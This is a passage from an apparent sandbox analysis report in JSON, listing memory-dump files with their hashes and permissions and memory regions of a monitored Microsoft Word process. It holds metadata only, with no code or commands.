"summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "dd9a32dd92b5707883166c9e41badfd8bb347192", "sha256_hash": "a526dee5f1f339d1db164aed274d9cf7d29d4f084d2fc13662223149872831cd", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001224-addr_0x00000000001e0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000005-region_00001224-addr_0x00000000001e0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_169", "md5_hash": "639cddf140b2166496000748cf0485ef", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7b1be96b80341718a2fb36f98d7df5328e13dd4f", "sha256_hash": "a2121d5b568c980c9f8f87bf53745c7a6ec0400e37e3bca9411244ccc9a2c761", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001225-addr_0x00000000023e0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000005-region_00001225-addr_0x00000000023e0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_170", "md5_hash": "8f5ada5812b8e3e637690d157b350581", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "32559b80178c18cf31c1287eddb311edbfbdb0c5", "sha256_hash": "347593247f70c42e227a7e2d53ee11dc74e0967e5c9c6137df56efaee0afcd5c", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001226-addr_0x0000000002440000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000005-region_00001226-addr_0x0000000002440000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_171", "md5_hash": "4104c3727b71fa3a70abb4546f320fbe", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c1834f47dc8c1a7dcbf4e74fd88f3bc32ffdfd81", "sha256_hash": "7837ba53d8862392831c20194cf9602210158ee337c2e6e1f4640c9c8ba6f49b", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001227-addr_0x00000000027d0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000005-region_00001227-addr_0x00000000027d0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_172", "md5_hash": "dc6202aa184a4b50afa1212539a652a1", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3439d8d8c1c4c31831403e67221f83d00298ef7f", "sha256_hash": "b68460f047fef7bd2a36ddd07a165ffa88c8cbdff20d62e5e0579f5bd06dd394", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001228-addr_0x0000000002a10000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000005-region_00001228-addr_0x0000000002a10000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_173", "md5_hash": "6317195df9c48bc5bd007c27e86a5aef", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "994453f5262567c594443f00694ef333e2ee51c6", "sha256_hash": "3d5d5be1c31de5e74190d259cd67940e0821f4c425a8a40e101bdc55bfc4c486", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001229-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000005-region_00001229-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_174", "md5_hash": "b95e691116b4e90cca06c815fbc0cedc", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "774646025d1879aaec5fe790dddbd07a3bcf92f3", "sha256_hash": "3ade5d4c0d72ba7e87eebfeb79898de4189a7ddb67ae59a03fcc24dbc51343dd", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001230-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000005-region_00001230-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_175", "md5_hash": "4d03bd640f0d355fbb05cd788f3dc0ef", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "06bdd8be44d8cec9e2040158982b953bb2578596", "sha256_hash": "28459faefbda5b2fe72b95e7a41d5c56fb8d90be026188f32c87213e19e684d2", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001231-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000005-region_00001231-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_176", "md5_hash": "1e18c74f26f3684d488d29add0e79b7d", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "841dff3ace164488e5f07dc4a5d065061989cbf8", "sha256_hash": "fe46a5bdda6523e5427d7708e3317a79bf2322f9aa0e6bd8e272999df55e9f1d", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001237-addr_0x0000000002370000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000005-region_00001237-addr_0x0000000002370000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_177", "md5_hash": "6b962801f9be3d26aaff6b217ff6c42e", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fb44c2acd2e2be5b715ba20355ecb83a39b4d9a0", "sha256_hash": "82b4b04cc541604a8339e598c32c4fa869c55742d3a006e437a300e56941002a", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001238-addr_0x0000000002ca0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000005-region_00001238-addr_0x0000000002ca0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_178", "md5_hash": "5a217727a2bd86e3a7f104d6e30a03d6", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2d18bfac9a7fb87c4ad96e0332abdb19f2748e8f", "sha256_hash": "e3a6d8783e976b6c9e8b70ecc6ddc19b2539641abace88a0c0720847022a6de7", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001242-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000005-region_00001242-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_179", "md5_hash": "5e17df2828c6b094b88b0b163ed23faf", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4ba64d7336e25c35ed87471c966f9844aa1feee6", "sha256_hash": "d140bcc97a3813c92efe569160874e3ef694945fdcb97036f7c57fd5928f5c9a", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000005-region_00001254-addr_0x00000000028d0000-size_0x0000000000101000-perm_rw.bin", "filename": "process_00000005-region_00001254-addr_0x00000000028d0000-size_0x0000000000101000-perm_rw.bin", "id": "proc_dump_180", "md5_hash": "abe23b874c32afbe6285b4d1f547ee1b", "ref_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ffa398b9456d586ce4a744024ee59202848f34a3", "sha256_hash": "16c4a98382cc4cb91869c8a16199be731fbcaad91d3f95bb287b763e1e2aaa3e", "size": 1052672, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001304-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000006-region_00001304-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_184", "md5_hash": "aa9e5ddd8e5355f58d7090ca0a588c9a", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c0254868ebff9741ae2c8435d3bf818da9fc2e69", "sha256_hash": "266007803615d7f475cb81e2a4faa0a787efdb296f6cbb5caac0ea967176bbd4", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001305-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000006-region_00001305-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_185", "md5_hash": "159202cb60db690a2fbb7afc3004cad2", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bfb0cc6d5dc008c8eaa37bdb899b5a8bfac84334", "sha256_hash": "0cddde3686157b63f3c4536c1200f103ebd80731f801db709636523d1a06269e", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001309-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000006-region_00001309-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_186", "md5_hash": "70a04527b3e4e63e53a5f708ff497db5", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d28ef4235cb1f4e6f8a15fe5b81596b5bd15ac0d", "sha256_hash": "1c93173de54fc94f9efcc883a0674af679eeb53df66feb5916ac38bbf106b1c6", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001310-addr_0x00000000002e0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000006-region_00001310-addr_0x00000000002e0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_187", "md5_hash": "c6e80825bb4dc5d4e857f53735955825", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2040d741bd1474ce3c3345425b906623b3f8e29a", "sha256_hash": "a4fec4c0197dc9ba398bd3bced9bbab104911a8e87a4ed37884721be936fe807", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001311-addr_0x0000000000be0000-size_0x000000000001f000-perm_rwx.bin", "filename": "process_00000006-region_00001311-addr_0x0000000000be0000-size_0x000000000001f000-perm_rwx.bin", "id": "proc_dump_188", "md5_hash": "5a548b8ab347910b119f1524b95f739a", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "48112f48c3bf16ca51985ba45e84af2d67bf41a0", "sha256_hash": "df4ceb2d048db2a43aedb17521a02c56eef10679879fcef04c4af2589fd7dd01", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001315-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000006-region_00001315-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_189", "md5_hash": "72eeeb2af4af601b30bf493fb701c2f7", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2dcf5958be85dbf5d372cfe00b21aa286f3a0307", "sha256_hash": "a0f8f1b319b1eadfca09d0fa56c3b7617dd692be043982b2ab6c21f7b586ae8d", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001316-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000006-region_00001316-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_190", "md5_hash": "f315282a905239a3447d48b0ff9f6db8", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5002370bf0d792c9f4fcf69813f80a2fcd55871c", "sha256_hash": "eaf82d74557815c7cfca03c57bff56e74fc200eef5edfd0cf7cd228c4ca3f980", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001317-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000006-region_00001317-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_191", "md5_hash": "e836acd2adb4822945e27328f7973920", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5065e5ecfdd4642a6f737f9e1507c204ff14d97f", "sha256_hash": "b7f4c3ca0bbfc1374374555880c79fa74acdd59023bc1ff3f9ea7d94920969e2", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001319-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "filename": "process_00000006-region_00001319-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "id": "proc_dump_192", "md5_hash": "2526d26223f607ee3da089e1d9db8624", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fb55e86cdd13745349fb20e882c9e7a0d6edf2ff", "sha256_hash": "28b33b145069ab36682bed391040a32b7355d4a1f8e62bf077795d3ef2c04f5c", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001321-addr_0x0000000000560000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000006-region_00001321-addr_0x0000000000560000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_193", "md5_hash": "ac12d4594fe9498a2473d417dc4e9d9c", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a1cd61fb27218c14f505a84eb26953400449a35f", "sha256_hash": "8f519b5313809a527add887d1786898f9b413866f4111f2d122c9a248d9d864b", "size": 524288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001327-addr_0x0000000000120000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000006-region_00001327-addr_0x0000000000120000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_194", "md5_hash": "7f29644ec33386be31f0c6f64b364449", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "75f1f0a4cb81a5951002fe34069a3811ffaef57c", "sha256_hash": "1a3f00b4a615fd967f56c94a5f7d88c3c2ae9ac902b5666a2f14a1f671568908", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001328-addr_0x0000000000760000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000006-region_00001328-addr_0x0000000000760000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_195", "md5_hash": "1eaceaa6e2d95504cdd6057313290b2b", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4e99abfe5da47415d46224efb34ab796225d2a5d", "sha256_hash": "c88289758d5a76568cdcbde4d0cb39019c1b3b82c031f56495e532ee77896af5", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001347-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "filename": "process_00000006-region_00001347-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "id": "proc_dump_196", "md5_hash": "6eeea0bcbc21bd1c0d7f0d6ae3488f7b", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fad191d56abe255a03a7b4b3b641fcfa8a4f81fe", "sha256_hash": "938a68694e4495227ebc925be61a20adb5c6c82d7dd57cc67a2717e2f9f2bf70", "size": 1024000, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001348-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "filename": "process_00000006-region_00001348-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "id": "proc_dump_197", "md5_hash": "caf76e9dd8864dfb7d729847f3595e80", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "71745f0f20bf18b3813fbb1a30eed8d41dc1d51d", "sha256_hash": "f113bc4b90aa0447b7992c2783d7c3b16d63f0e65e2c54c6e93ba833e8e0c667", "size": 1175552, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001354-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000006-region_00001354-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_198", "md5_hash": "ef03a2ffbf89d164b25e131f420e6343", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bba36481837a41940e3fb1e8701854f27ee8ac91", "sha256_hash": "d0f5a08a845b0c81b0dc9e769b3ba6ae4be6f355b2f334f30f9f606d5991c1ce", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001355-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000006-region_00001355-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_199", "md5_hash": "baa095d0f424ded37169dccfabe2a48b", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "13de5554742b8bdbbac3f1dd140af759f9f055a4", "sha256_hash": "556d13cdbbe748d7480e2434b1f1d58ff20c3c4211c0491da0abbd118c4e58cc", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001358-addr_0x00000000021b0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000006-region_00001358-addr_0x00000000021b0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_200", "md5_hash": "fe1ac94fd30fb7daf085c91b4cafdf70", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "065e0137b2e5b8530f4968d3d7c3fa34269af9d9", "sha256_hash": "2bc7d4a65813a379e659a3fcdb905b857f1fde7a8e351c22ffcf8b8dca4919fc", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001361-addr_0x00000000001b0000-size_0x0000000000110000-perm_rw.bin", "filename": "process_00000006-region_00001361-addr_0x00000000001b0000-size_0x0000000000110000-perm_rw.bin", "id": "proc_dump_201", "md5_hash": "40c95ca2e595b0d164fff6f90c314d14", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e1bd5f8c58014ce012dbd988f2683a0cdd5b12df", "sha256_hash": "f2a3990583a48bee3ff30316f38899a69699857ba877f75619139e7beeedcba0", "size": 1114112, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001363-addr_0x00000000000e0000-size_0x0000000000012000-perm_rw.bin", "filename": "process_00000006-region_00001363-addr_0x00000000000e0000-size_0x0000000000012000-perm_rw.bin", "id": "proc_dump_202", "md5_hash": "b326be6a0d9e4d0e381c83fd4b03c9fe", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "39aea93cd97cb1b9722f3676559d0c4629918156", "sha256_hash": "6c6dcb3c24e6201cd6c68d7cbfce232772efd3b72a13c3fc3abd98a5fe699619", "size": 73728, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001364-addr_0x0000000000100000-size_0x000000000000e000-perm_rwx.bin", "filename": "process_00000006-region_00001364-addr_0x0000000000100000-size_0x000000000000e000-perm_rwx.bin", "id": "proc_dump_203", "md5_hash": "94bddbc102a227ce8afa59d48d15caa5", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "35be115a551aade317ac0376d55c116983be1199", "sha256_hash": "48d7fcb1aaa838ffaf521da4d5429c973dd66936601114d30b0ba5529603f5a8", "size": 57344, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001365-addr_0x0000000002490000-size_0x00000000003d1000-perm_rw.bin", "filename": "process_00000006-region_00001365-addr_0x0000000002490000-size_0x00000000003d1000-perm_rw.bin", "id": "proc_dump_204", "md5_hash": "9b6c5323b45fa426c20126101fe1ebb7", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a262651ee58dea160aef10fce716f5c105305096", "sha256_hash": "857ab20a9d5c94aa9625b6fbf99ea9c0c52c1c9024f37eb22985cbdf673eb8ea", "size": 4001792, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_133", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:10.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_134", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:10.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:10.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:10.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_137", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:10.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_138", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_139", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_142", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 0, "filename": null, "id": "region_143", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_144", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4268031, "entry_point": 0, "filename": null, "id": "region_146", "name": "pagefile_0x0000000000410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4259840, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4395007, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4464639, "entry_point": 0, "filename": null, "id": "region_149", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4530175, "entry_point": 0, "filename": null, "id": "region_150", "name": "pagefile_0x0000000000450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4521984, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4599807, "entry_point": 0, "filename": null, "id": "region_151", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4718591, "entry_point": 0, "filename": null, "id": "region_152", "name": 